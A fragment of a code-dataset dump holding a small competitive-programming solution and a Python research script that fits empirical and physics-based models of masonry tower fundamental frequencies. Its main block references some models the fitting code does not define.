documentation\\n\\n\")\n\nprint_ir_ops()\n\nprint_ir_defines(defines)\n\noutput_file.close()\n","repo_name":"merryhime/FEX","sub_path":"External/FEXCore/Scripts/json_ir_doc_generator.py","file_name":"json_ir_doc_generator.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"18226436138","text":"import sys\n\ninput = sys.stdin.readline\n\nn = int(input())\nh = list(map(int, input().split()))\ncnt = 1\nfor i in range(n-1):\n if h[i] > h[i+1]:\n continue\n cnt += 1\nprint(cnt)\n","repo_name":"jun673012/Algorithm","sub_path":"BOJ/28014.py","file_name":"28014.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"30747923455","text":"#Class to deal with empirical relation\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom scipy.optimize import curve_fit\nimport uncertainties as unc\nimport uncertainties.unumpy as unp\nfrom scipy import stats\nimport ipdb as db\nimport sys\nfrom figure_rule import *\n\n#default Parameters to plot\nmpl.rcParams['lines.linewidth'] = 2.0\nmpl.rcParams.update({'font.size': 14})\n\n\nclass Formulation():\n\t\"\"\"Attributing empirical and physic based model to a single slender structure\"\"\"\n\tdef __init__(self, slender_st):\n\t\t\"\"\"\n\t\tsingle attribut class : structures \n\t\t\"\"\"\n\t\tself.slender_st = slender_st\n\t\tself.shape = self.slender_st['shape']\n\t\tself.height = float(self.slender_st['H'])\n\t\tself.effective_height = float(self.slender_st['Heff'])\n\t\tself.breadth = float(self.slender_st['breadth'])\n\t\tself.length = float(self.slender_st['length'])\n\t\tself.max_thickness = float(self.slender_st['max_wall_thickness'])\n\t\tself.f0 = float(self.slender_st['f0'])\n\t\ttry:\n\t\t\tself.young = 1e9*float(self.slender_st['E'])\n\t\texcept:\n\t\t\tself.young = np.max([1e9*float(item) for item in self.slender_st['E'].split(',')])\n\n\t\ttry:\t\n\t\t\tself.density = 100*float(self.slender_st['density'])\n\t\texcept:\n\t\t\tself.density = np.max([100*float(item) for item in self.slender_st['density'].split(',')])\n\n\n\t\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t\t# ~~~~~  Parameters for empirical models ~~~~~\n\t\t# ~~~~~  cv Table ? in paper doi: ~~~~~\n\t\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t\t# A test is processed to check if parameters exist\n\t\tself.exist_height = self.height != -1 \n\t\tself.exist_effective_height = self.effective_height != -1 \n\t\tself.exist_breadth = self.breadth != -1\n\t\tself.exist_length = self.length != -1\n\t\tself.exist_max_thickness = self.max_thickness != -1\n\t\tself.exist_E = self.young != -1\n\t\tself.exist_rho = self.density != -1\n\n\t\tself.emp_model = {'model_1_1' :{'a1' : [20.], 'b1' : [-3./4.], 'a1s' : [0.], 'b1s' : [0.], 'b2s' : [0.], 'b1e': [0.], 'exist': [self.exist_height]},\n\t\t 'model_1_2' :{'a1' : [1./0.0187], 'b1' : [-1.], 'a1s' : [0.], 'b1s' : [0.], 'b2s' : [0.], 'b1e': [0.], 'exist': [self.exist_height]},\n\t\t 'model_1_3' :{'a1' : [1./0.01137], 'b1' : [-1.138], 'a1s' : [0.], 'b1s' : [0.], 'b2s' : [0.], 'b1e': [0.] , 'exist': [self.exist_height]},\n\t\t 'model_1_4' :{'a1' : [1./0.0151], 'b1' : [-1.08], 'a1s' : [0.], 'b1s' : [0.], 'b2s' : [0.], 'b1e': [0.] , 'exist': [self.exist_height]},\n\t\t 'model_1_5' :{'a1' : [28.35], 'b1' : [-0.83], 'a1s' : [0.], 'b1s' : [0.], 'b2s' : [0.], 'b1e': [0.] , 'exist': self.exist_height},\n\t\t 'model_1_6' :{'a1' : [135.343], 'b1' : [-1.32], 'a1s' : [0.], 'b1s' : [0.], 'b2s' : [0.], 'b1e': [0.] , 'exist': [self.exist_height]},\n\t\t 'model_2' :{'a1' : [3.58], 'b1' : [0.], 'a1s' : [0.], 'b1s' : [0.57], 'b2s' : [0.], 'b1e': [0.] , 'exist': [self.exist_height, self.exist_breadth]},\n\t\t 'model_3' :{'a1' : [208.54], 'b1' : [-1.18], 'a1s' : [0.], 'b1s' : [0.55], 'b2s' : [0.], 'b1e': [0.] , 'exist': [self.exist_breadth]},\n\t\t 'model_4_1' :{'a1' : [1./0.06], 'b1' : [-0.5], 'a1s' : [2.], 'b1s' : [0.5], 'b2s' : [0.5], 'b1e': [0.] , 'exist': [self.exist_height, self.exist_breadth]},\n\t\t 'model_4_2':{'a1' : [1./0.03], 'b1' : [-0.83], 'a1s' : [1.], 'b1s' : [0.17], 'b2s' : [0.5], 'b1e': [0.] , 'exist': [self.exist_height, self.exist_breadth]},\n\t\t 'model_5':{'a1' : [1./0.0117], 'b1' : [0], 'a1s' : [-9.632], 'b1s' : [3], 'b2s' : [-1], 'a2s' : [94.786], 'a3s' : [144.461] ,'b1e': [0.] , 'exist': [self.exist_height, self.exist_breadth]},\n\t\t 'model_6':{'a1' : [12.96], 'b1' : [-0.686], 'a1s' : [0.], 'b1s' : [0.], 'b2s' : [0.], 'b1e': [-0.686], 'exist': [self.exist_height, self.exist_breadth, self.exist_effective_height]},\n\t\t 'model_7':{'a1' : [14.61], 'b1' : [-0.811], 'a1s' : [0.], 'b1s' : [-0.254], 'b2s' : [0.], 'b1e': [-0.341], 'exist': [self.exist_height, self.exist_breadth, self.exist_effective_height]},\n\t\t }\n\t\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t\t# ~~~~~  Parameters for physics based models ~~~~~\n\t\t# ~~~~~  cv Table ? in paper doi: ~~~~~\n\t\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t\tself.pb_model = {'model_1' : {'C1': np.sqrt(1.375), 'C2' : 0, 'C3' : 1, 'exist' :[self.exist_breadth, self.exist_length, self.exist_max_thickness, self.exist_height, self.exist_E, self.exist_rho]},\n\t 'model_2' : {'C1': 0.8 , 'C2' : 1, 'C3' : 1, 'exist' :[self.exist_breadth, self.exist_length, self.exist_max_thickness, self.exist_height, self.exist_E, self.exist_rho, self.exist_effective_height]},\n\t 'model_3' : {'C1': 0.8 , 'C2' : 0, 'C3' : 1, 'exist' :[self.exist_breadth, self.exist_length, self.exist_max_thickness, self.exist_height, self.exist_E, self.exist_rho]},\n\t 'model_4' : {'C1': 800 , 'C2' : 0, 'C3' : 0, 'exist' :[self.exist_breadth, self.exist_length, self.exist_max_thickness, self.exist_height]}\n\t\t\t\t}\n\n\n\tdef f0_emp(self, model_name):\n\t\t\"\"\" \n\t\tGeneral formulation of the fundamental frequency for empirical models\n\t\tmodel_name : Name of the physic based model to use\n\t\tH [m]: height of the tower\n\t\tls[m]: breadth (characteristic size of the section, minimum size)\n\t\thn[m]: interaction height between the tower and the adjacent structure\n\t\t\"\"\"\n\n\t\tparam = self.emp_model[model_name]\n\t\t\n\t\tif False not in param['exist']:\n\t\t\n\t\t\t# Parameters of the empirical model\n\t\t\t# ---------------------------------\n\t\t\tparam = self.emp_model[model_name]\n\t\t\ta1 = param['a1']\n\t\t\tb1 = param['b1']\n\t\t\ta1s = param['a1s']\n\t\t\tb1s = param['b1s']\n\t\t\tb2s = param['b2s']\n\t\t\tb1e = param['b1e']\n\n\t\t\talphal = np.divide(self.breadth,self.height)\n\t\t\talphah = np.divide(self.height - self.effective_height, self.height)\n\t\t\t#print('Empirical frequency succesfully computed from model: %s' %model_name)\n\n\t\t\treturn np.multiply(a1,np.power(self.height,b1)*np.power(alphal,b1s)*np.power(np.add(1.,np.multiply(a1s,alphal)),b2s)*np.power(np.subtract(1,alphah),b1e))\n\n\t\telse:\n\t\t\tprint(\"Warning: Empirical formulation cannot be used. A feature is missing.\")\n\t\t\treturn [None]\n\t\t\tpass\n\n\t\n\tdef f0_phy(self, model_name, theta):\n\t\t\"\"\" \n\t\tGeneral formulation of the fundamental frequency for physics based models\n\t\tmodel_name : Name of the physic based model to use\n\t\ttheta: rotation angle to compute the radius of inertia \n\t\t\"\"\"\n\t\t# Parameters of the physics based model\n\t\t# ---------------------------------\n\t\tparam = self.pb_model[model_name]\n\t\tc1 = param['C1']\n\t\tc2 = param['C2']\n\t\tc3 = param['C3']\n\n\t\tself.theta = theta\n\n\t\tif False not in param['exist']:\n\t\t\n\t\t\tself.alpha_t = self.max_thickness/self.breadth\n\t\t\tself.alpha_L = self.length/self.breadth\n\t\t\tself.alphah = np.divide(self.height - self.effective_height,self.height)\n\t\t\n\t\t\t# Compute the surface and Second moment of inertia\n\t\t\tif (self.shape == 'REC') or (self.shape == 'SQ'):\n\t\t\t\tself.alpha_shs = 1\n\t\t\t\tself.alpha_shi = 1/12\n\t\t\telse:\n\t\t\t\tself.alpha_shs = np.pi/4\n\t\t\t\tself.alpha_shi = np.pi/64\n\t\t\t\t\n\t\t\tS = 2*self.alpha_shs*(self.breadth**2)*(self.alpha_L + 1 - 2*self.alpha_t)\n\t\t\tself.alpha_S = 2*self.alpha_shs*(self.alpha_L + 1 - 2*self.alpha_t)\n\t\t\tself.alpha_Ix = self.alpha_shi*(self.alpha_L - (self.alpha_L - 2*self.alpha_t)*((1-2*self.alpha_t)**3))\n\t\t\tself.alpha_Iy = self.alpha_shi*(self.alpha_L**3 - ((self.alpha_L - 2*self.alpha_t)**3)*(1-2*self.alpha_t))\n\t\t\t\t\n\n\t\t\t# Compute radius of inertia\n\t\t\tif model_name == 'model_1':\n\t\t\t\tr = self.breadth*np.sqrt(np.divide(1,self.alpha_S))*np.sqrt(np.divide(self.alpha_Ix + self.alpha_Iy, 2) + (np.divide(self.alpha_Ix - self.alpha_Iy, 2)* np.cos(2*self.theta)))\n\n\t\t\telif model_name == 'model_2':\n\t\t\t\tr = np.divide(self.breadth, np.sqrt(12))*1.5*(1-self.alpha_t)\n\n\t\t\telif model_name == 'model_3':\n\t\t\t\tr = np.divide(self.breadth, np.sqrt(12))*1.125\n\t\t\t\n\t\t\telif model_name == 'model_4':\n\t\t\t\tr = np.divide(self.breadth, np.sqrt(12))*1.125\n\n\t\t\tself.alpha_h = np.divide(self.height-self.effective_height,self.height)\n\n\t\t\treturn c1*np.divide(1.875**2, 2*np.pi)*np.divide(r,np.power(self.height,2))*np.power(np.divide(1, 1 - self.alpha_h),c2)*np.power(np.sqrt(np.divide(self.young, self.density)),c3)\n\n\t\telse:\n\t\t\tprint(\"Warning: Physics based formulation cannot be used. A feature is missing.\")\n\t\t\treturn None\n\t\t\tpass\n\n\n\n\nclass Regression():\n\t\"\"\"Attributing empirical and physic based model to a single slender structure\"\"\"\n\tdef __init__(self, database):\n\t\tself.database = database\n\n\tdef model_1_emp(self, x, a1, b1):\n\t\t\"\"\"\n\t\tEmpirical model 1: Compute the regression analysis between the height (input) and the fundamental frequency (output)\n\t\tCorrespond to model 1_1 -> model 1_6 in Montabert et al, 2023\n\t\tReferences: Eurocode 8; Faccio et al, 2010; Rainieri et al, 2012; Shakya et al, 2016, Diafeiro et al, 2018.\n\t\t\"\"\"\n\t\treturn np.multiply(a1, np.power(x, b1))\n\t\t\n\tdef model_2_emp(self, x, a1, b1s):\n\t\t\"\"\"\n\t\tEmpirical model 2: Compute the regression analysis between the height, the breadth (input) and the fundamental frequency (output)\n\t\tCorrespond to model 2 in Montabert et al, 2023\n\t\tReferences: Shakya et al, 2016.\n\t\t\"\"\"\n\t\treturn np.multiply(a1, np.power(x, b1s))\n\n\tdef model_3_emp(self, x, a1, b1, b1s):\n\t\t\"\"\"\n\t\tEmpirical model 3: Compute the regression analysis between the height, the breadth (input) and the fundamental frequency (output)\n\t\tCorrespond to model 3 in Montabert et al, 2023\n\t\tReferences: Diafeiro et al, 2018.\n\t\t\"\"\"\n\t\treturn np.multiply(np.multiply(a1, np.power(x[:,0], b1)), np.power(x[:,1], b1s))\n\n\tdef model_4_emp(self, x, a1, b1, b1s, a1s, b2s):\n\t\t\"\"\"\n\t\tEmpirical model 4_1 and model 4_2: Compute the regression analysis between the height, the breadth (input) and the fundamental frequency (output)\n\t\tCorrespond to model 9 in Montabert et al, 2023\n\t\tReferences: NCSR-02\n\t\t\"\"\"\n\t\treturn np.multiply(np.multiply(a1, np.power(x[:,0], b1)), np.multiply(np.power(x[:,1], b1s), np.power(1+(np.multiply(a1s,x[:,1])), b2s)))\n\t\t#return a1*(x[:,0]**b1)*(x[:,1]**b1s)*((1+(a1s*x[:,1]))**b2s)\n\n\tdef model_5_emp(self, x, a1, b1s, a1s, b2s, a2s, a3s):\n\t\t\"\"\"\n\t\tEmpirical model 5: Compute the regression analysis between the height, the breadth (input) and the fundamental frequency (output)\n\t\tCorrespond to model 5 in Montabert et al, 2023\n\t\tReferences: Formisano et al, 2017.\n\t\t\"\"\"\n\t\treturn np.multiply(a1, np.multiply(np.power(x[:,1], b1s), np.power(1+(a1s*x[:,1]) + np.multiply(a2s, np.power(x[:,1],2)) + np.multiply(a3s, np.power(x[:,1],3)), b2s)))\n\t\t#return a1*(x[:,1]**b1s)*((1+(a1s*x[:,1]) + (a2s*x[:,1])**2 + (a3s*x[:,1])**3)**b2s)\n\n\tdef model_6_emp(self, x, a1, b1, b1e):\n\t\t\"\"\"\n\t\tEmpirical model 6 : Compute the regression analysis between the height, the breadth (input) and the fundamental frequency (output)\n\t\tCorrespond to model 6 in Montabert et al, 2023\n\t\tReferences: Diafeiro et al, 2018.\n\t\t\"\"\"\n\t\t#return np.multiply(np.multiply(a1, np.power(x[:,0], b1)), np.power( 1 - x[:,1], b1e))\n\t\treturn a1*(x[:,0]**b1)*((1-x[:,1]))**b1e\n\n\tdef model_7_emp(self, x, a1, b1, b1s, b1e):\n\t\t\"\"\"\n\t\tEmpirical model 13 : Compute the regression analysis between the height, the breadth (input) and the fundamental frequency (output)\n\t\tCorrespond to model 13 in Montabert et al, 2023\n\t\tReferences: Diafeiro et al, 2018.\n\t\t\"\"\"\n\t\treturn np.multiply(np.multiply(a1, np.power(x[:,0], b1)), np.multiply(np.power(x[:,1], b1s) ,np.power( 1 - x[:,2], b1e)))\n\n\n\tdef R_squarred(self, model, experiment):\n\t\t\"\"\"Compute R-squarred for a distribution\"\"\"\n\t\tself.SSR = np.sum((experiment - model)**2)\n\t\tself.SST = np.sum((experiment - np.mean(experiment))**2)\n\n\t\treturn 1 - np.divide(self.SSR, self.SST)\n\t\n\tdef power_law(self, x, a, b):\n\t\t\"\"\" Power law function for curve fitting\"\"\"\n\t\treturn np.divide(1, a*np.power(x, b))\n\n\tdef fit_power_model(self, model):\n\t\t\"\"\"Fit relation\"\"\"\n\n\t\tydata = self.database['f0']\n\t\tif model == 'model_1':\n\t\t\t# ~~ Step1: clean database ~~\n\t\t\tself.database = self.database[(self.database['H'] != -1) & (self.database['f0'] != -1)]\n\t\t\tself.output = np.asarray(self.database['f0'])\n\t\t\tself.input = np.asarray(self.database['H'])\n\t\t\tself.f = self.model_1_emp\n\n\t\telif model == 'model_2':\n\t\t\t# ~~ Step1: clean database ~~\n\t\t\tself.database = self.database[(self.database['H'] != -1) & (self.database['breadth'] != -1) & (self.database['f0'] != -1)]\n\t\t\tself.output = np.asarray(self.database['f0'])\n\t\t\tself.input = np.asarray(np.divide(self.database['breadth'], self.database['H']))\n\t\t\tself.f = self.model_2_emp\n\t\t\t\n\t\telif model == 'model_3':\n\t\t\t# ~~ Step1: clean database ~~\n\t\t\tself.database = self.database[(self.database['H'] != -1) & (self.database['breadth'] != -1) & (self.database['f0'] != -1)]\n\t\t\tself.output = np.asarray(self.database['f0'])\n\t\t\tself.input = np.vstack((np.asarray(self.database['H']), np.asarray(np.divide(self.database['breadth'], self.database['H'])))).T\n\t\t\tself.f = self.model_3_emp\n\n\t\telif model == 'model_4':\n\t\t\t# ~~ Step1: clean database ~~\n\t\t\tself.database = self.database[(self.database['H'] != -1) & (self.database['breadth'] != -1) & (self.database['f0'] != -1)]\n\t\t\tself.output = np.asarray(self.database['f0'])\n\t\t\tself.input = np.vstack((np.asarray(self.database['H']), np.asarray(np.divide(self.database['breadth'], self.database['H'])))).T\n\t\t\tself.f = self.model_4_emp\n\n\t\telif model == 'model_5':\n\t\t\t# ~~ Step1: clean database ~~\n\t\t\tself.database = self.database[(self.database['H'] != -1) & (self.database['breadth'] != -1) & (self.database['f0'] != -1)]\n\t\t\tself.output = np.asarray(self.database['f0'])\n\t\t\tself.input = np.vstack((np.asarray(self.database['H']), np.asarray(np.divide(self.database['breadth'], self.database['H'])))).T\n\t\t\tself.f = self.model_5_emp\n\n\t\telif model == 'model_6':\n\t\t\t# ~~ Step1: clean database ~~\n\t\t\tself.database = self.database[(self.database['H'] != -1) & (self.database['Heff'] != -1) & (self.database['Heff'] != 0) & (self.database['f0'] != -1)]\n\t\t\tself.output = np.asarray(self.database['f0'])\n\t\t\tself.input = np.vstack((np.asarray(self.database['H']), np.asarray(np.divide(self.database['H'] - self.database['Heff'], self.database['H'])))).T\n\t\t\tself.f = self.model_6_emp\n\n\t\telif model == 'model_7':\n\t\t\t# ~~ Step1: clean database ~~\n\t\t\tself.database = self.database[(self.database['H'] != -1) & (self.database['Heff'] != -1) & (self.database['Heff'] != 0) & (self.database['f0'] != -1) & (self.database['breadth'] != -1)]\n\t\t\tself.output = np.asarray(self.database['f0'])\n\t\t\tself.input = np.vstack((np.asarray(self.database['H']), np.asarray(np.divide(self.database['breadth'] , self.database['H'])), np.asarray(np.divide(self.database['H'] - self.database['Heff'], self.database['H'])))).T\n\n\t\t\tself.f = self.model_7_emp\n\n\n\t\t#Curve fit\n\t\tself.pars, self.cov = curve_fit(f=self.f, xdata= self.input, ydata= self.output, maxfev = 100000000)\n\n\t\t#standard error of parameters\n\t\tself.stderr = np.sqrt(np.diag(self.cov))\n\n\t\t\n\t\t#compute residuals\n\t\tself.res = self.database['f0'] - self.f(self.input, *self.pars)\n\n\t\t#Compute R-squarred\n\t\tself.R2 = self.R_squarred(self.f(self.input, *self.pars), self.database['f0'])\n\t\t\n\t\treturn self.pars, self.cov, self.stderr, self.res, self.R2\n\n\n\tdef IC(self, x, func):\n\t\t\"\"\"Compute interval confidence\n\t\tx : dedicated interval\n\t\t\n\t\t\"\"\"\n\t\t#correlated values\n\t\ta, b = unc.correlated_values(self.pars, self.cov)\n\n\t\t#distributed model\n\t\tcy = func(x, a, b)\n\n\t\t#nominal value and standard deviation\n\t\tself.nom = unp.nominal_values(cy)\n\t\tself.std = unp.std_devs(cy)\n\n\t\treturn self.nom, self.std\n\n\n\nif __name__ == \"__main__\":\n\n\t# Load the masonry database\n\tpath_data = 'TURRIS.xlsx'\n\tdatabase = pd.read_excel(path_data)\n\n\t\"\"\"# TEST 1: Empirical and physics based formulation to evaluate the fundamental frequency\n\t# Choose your model\n\tmodel_emp = 'model_1'\n\tmodel_pb = 'model_2'\n\n\t# Read one tower at a time\n\tfor ii in range(len(database)):\n\t\tprint(\"~~~~~~~~~~~~ Tower # %s ~~~~~~~~~~~\" % str(ii))\n\t\ttower = Formulation(database.iloc[ii]) # Build Empirical formulation object\n\t\tprint(\"Tower name: %s. References: %s\" % (tower.slender_st['building_name'], tower.slender_st['references']))\n\t\t# ~~~~ Empirical formulation of f0 ~~~~\n\t\tf0_model_emp = tower.f0_emp(model_emp)\n\t\tif f0_model_emp[0] != None:\n\t\t\tprint('Empirical model: %s, frequency: %s Hz' % (model_emp, f0_model_emp[0]))\n\t\t\tprint('Relative error between exp. f0 and emp. f0: %s' % np.divide(tower.f0 - f0_model_emp, tower.f0)[0])\n\t\t# ~~~~ Physics based formulation of f0 ~~~~\n\t\tf0_model_pb = tower.f0_phy(model_pb, 45)\n\t\tif f0_model_pb != None:\n\t\t\tprint('Physics based model: %s, frequency: %s Hz' % (model_pb, f0_model_pb))\n\t\t\tprint('Relative error between exp. f0 and emp. f0: %s' % np.divide(tower.f0 - f0_model_pb, tower.f0))\n\t\tprint(' ')\"\"\"\n \n\n\t# TEST 2: Regression analysis\n\t# ~ You can create your own database or use the default one\n\n\tdatabase = pd.read_excel(path_data) #default database\n\tdatabase.fillna(-1, inplace=True)#fill Nan\n\n\t# Test the database excluding outliers\n\t#database = database[database['f0'] < 8]\n\n\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ MODEL 1 --> 6 ~~\n\t# ~~ Table 2 in Montabert et al:, 2023 ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~ Build the Regression object~\n\tReg1 = Regression(database)\n\n\tprint('Regression analysis to update first empirical model (model_1 --> model_6)')\n\tpars, cov, ste, res, R2_tower = Reg1.fit_power_model(\"model_1\")\n\tprint('~~ Results ~~')\n\tprint('a1 : ' , np.round(pars[0], 3), ' std : ', np.round(ste[0], 3) )\n\tprint('b1 : ' , np.round(pars[1], 3), ' std : ', np.round(ste[1], 3) )\n\tprint('R2 : ', np.round(R2_tower, 2))\n\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ MODEL 7 ~~\n\t# ~~ Table 2 in Montabert et al:, 2023 ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~ Build the Regression object~\n\tReg2 = Regression(database)\n\t# fit power law: model 7 in Table 2\n\tprint('Regression analysis to update first empirical model (model_7)')\n\tpars, cov, ste, res, R2_tower = Reg2.fit_power_model(\"model_7\")\n\tprint('~~ Results ~~')\n\tprint('a1 : ' , np.round(pars[0], 3), ' std : ', np.round(ste[0], 3) )\n\tprint('bs1 : ' , np.round(pars[1], 3), ' std : ', np.round(ste[1], 3) )\n\tprint('R2 : ', np.round(R2_tower, 2))\n\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ MODEL 8 ~~\n\t# ~~ Table 2 in Montabert et al:, 2023 ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~ Build the Regression object~\n\tReg3 = Regression(database)\n\t# fit power law: model 8 in Table 2\n\tprint('Regression analysis to update first empirical model (model_8)')\n\tpars, cov, ste, res, R2_tower = Reg3.fit_power_model(\"model_8\")\n\tprint('~~ Results ~~')\n\tprint('a1 : ' , np.round(pars[0], 3), ' std : ', np.round(ste[0], 3) )\n\tprint('b1 : ' , np.round(pars[1], 3), ' std : ', np.round(ste[1], 3) )\n\tprint('bs1 : ' , np.round(pars[2], 3), ' std : ', np.round(ste[2], 3) )\n\tprint('R2 : ', np.round(R2_tower, 2))\n\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ MODEL 9 --> 10 ~~\n\t# ~~ Table 2 in Montabert et al:, 2023 ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~ Build the Regression object~\n\tReg4 = Regression(database)\n\t# fit power law: model 9 and 10 in Table 2\n\tprint('Regression analysis to update first empirical model (model_9 and 10)')\n\tpars, cov, ste, res, R2_tower = Reg4.fit_power_model(\"model_9\")\n\tprint('~~ Results ~~')\n\tprint('a1 : ' , np.round(pars[0], 3), ' std : ', np.round(ste[0], 3) )\n\tprint('b1 : ' , np.round(pars[1], 3), ' std : ', np.round(ste[1], 3) )\n\tprint('bs1 : ' , np.round(pars[2], 3), ' std : ', np.round(ste[2], 3) )\n\tprint('a1s : ' , np.round(pars[3], 3), ' std : ', np.round(ste[3], 3) )\n\tprint('b2s : ' , np.round(pars[4], 3), ' std : ', np.round(ste[4], 3) )\n\tprint('R2 : ', np.round(R2_tower, 2))\n\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ MODEL 11 ~~\n\t# ~~ Table 2 in Montabert et al:, 2023 ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~ Build the Regression object~\n\tReg5 = Regression(database)\n\t# fit power law: model 11 in Table 2\n\tprint('Regression analysis to update first empirical model (model_11)')\n\tpars, cov, ste, res, R2_tower = Reg5.fit_power_model(\"model_11\")\n\tprint('~~ Results ~~')\n\tprint('a1 : ' , np.round(pars[0], 3), ' std : ', np.round(ste[0], 3) )\n\tprint('bs1 : ' , np.round(pars[1], 3), ' std : ', np.round(ste[1], 3) )\n\tprint('a1s : ' , np.round(pars[2], 3), ' std : ', np.round(ste[2], 3) )\n\tprint('b2s : ' , np.round(pars[3], 3), ' std : ', np.round(ste[3], 3) )\n\tprint('a2s : ' , np.round(pars[4], 3), ' std : ', np.round(ste[4], 3) )\n\tprint('a3s : ' , np.round(pars[5], 3), ' std : ', np.round(ste[5], 3) )\n\tprint('R2 : ', np.round(R2_tower, 2))\n\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ MODEL 12 ~~\n\t# ~~ Table 2 in Montabert et al:, 2023 ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~ Build the Regression object~\n\tReg6 = Regression(database)\n\t# fit power law: model 12 in Table 2\n\tprint('Regression analysis to update first empirical model (model_12)')\n\tpars, cov, ste, res, R2_tower = Reg6.fit_power_model(\"model_12\")\n\tprint('~~ Results ~~')\n\tprint('a1 : ' , np.round(pars[0], 3), ' std : ', np.round(ste[0], 3) )\n\tprint('b1 : ' , np.round(pars[1], 3), ' std : ', np.round(ste[1], 3) )\n\tprint('b2e : ' , np.round(pars[2], 3), ' std : ', np.round(ste[2], 3) )\n\tprint('R2 : ', np.round(R2_tower, 2))\n\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ MODEL 13 ~~\n\t# ~~ Table 2 in Montabert et al:, 2023 ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~ Build the Regression object~\n\tReg7 = Regression(database)\n\t# fit power law: model 13 in Table 2\n\tprint('Regression analysis to update first empirical model (model_13)')\n\tpars, cov, ste, res, R2_tower = Reg7.fit_power_model(\"model_13\")\n\tprint('~~ Results ~~')\n\tprint('a1 : ' , np.round(pars[0], 3), ' std : ', np.round(ste[0], 3) )\n\tprint('b1 : ' , np.round(pars[1], 3), ' std : ', np.round(ste[1], 3) )\n\tprint('b1s : ' , np.round(pars[2], 3), ' std : ', np.round(ste[2], 3) )\n\tprint('b2e : ' , np.round(pars[3], 3), ' std : ', np.round(ste[3], 3) )\n\tprint('R2 : ', np.round(R2_tower, 2))\n\n\n\n\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ PLOT FIGURE FOR EMPIRICAL LAW ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\tfig = plt.figure(1, figsize = (10, 10))\n\tspec = gridspec.GridSpec(figure = fig, ncols=3, nrows=3, top = 0.95, bottom = 0.06, left = 0.1, right = 0.97, wspace = 0.1, hspace = 0.3)\n\n\t# ~ prepare axis\n\tax11 = fig.add_subplot(spec[0, 0])\n\tax12 = fig.add_subplot(spec[0, 1])\n\tax13 = fig.add_subplot(spec[0, 2])\n\tax21 = fig.add_subplot(spec[1, 0])\n\tax22 = fig.add_subplot(spec[1, 1], sharex = ax12)\n\tax23 = fig.add_subplot(spec[1, 2], sharex = ax13)\n\tax31 = fig.add_subplot(spec[2, 0], sharex = ax21)\n\t\"\"\"ax32 = fig.add_subplot(spec[2, 1], sharex = ax22,sharey = ax31)\n\tax33 = fig.add_subplot(spec[2, 2], sharex = ax22,sharey = ax31)\n\tax41 = fig.add_subplot(spec[3, 0], sharex = ax22,sharey = ax31)\n\tax42 = fig.add_subplot(spec[3, 1], sharex = ax22,sharey = ax31)\"\"\"\n\n\t# ~~ default color \n\tmfc = 'dimgray'\n\tmec = 'k'\n\n\t# ~~ model 1 --> model 6\n\tprediction1 = Reg1.model_1_emp(Reg1.input, *(Reg1.pars))\n\tax11.plot(Reg1.database['H'], Reg1.database['f0'], linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax11.plot(Reg1.database['H'], prediction1, 'r+', ms = 6., label = 'model 1 -> 6')\n\n\t# ~~ model 7\n\tprediction2 = Reg2.model_7_emp(Reg2.input, *(Reg2.pars))\n\tax12.plot(Reg2.database['H'], Reg2.database['f0'], linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax12.plot(Reg2.database['H'], prediction2, 'r+', label = 'model 7')\n\n\t# ~~ model 8\n\tprediction3 = Reg3.model_8_emp(Reg3.input, *(Reg3.pars))\n\tax13.plot(Reg3.database['H'], Reg3.database['f0'], linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax13.plot(Reg3.database['H'], prediction3, 'r+', label = 'model 8')\n\n\t# ~~ model 9 & 10\n\tprediction4 = Reg4.model_9_emp(Reg4.input, *(Reg4.pars))\n\tax21.plot(Reg4.database['H'], Reg4.database['f0'], linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax21.plot(Reg4.database['H'], prediction4, 'r+', label = 'model 9 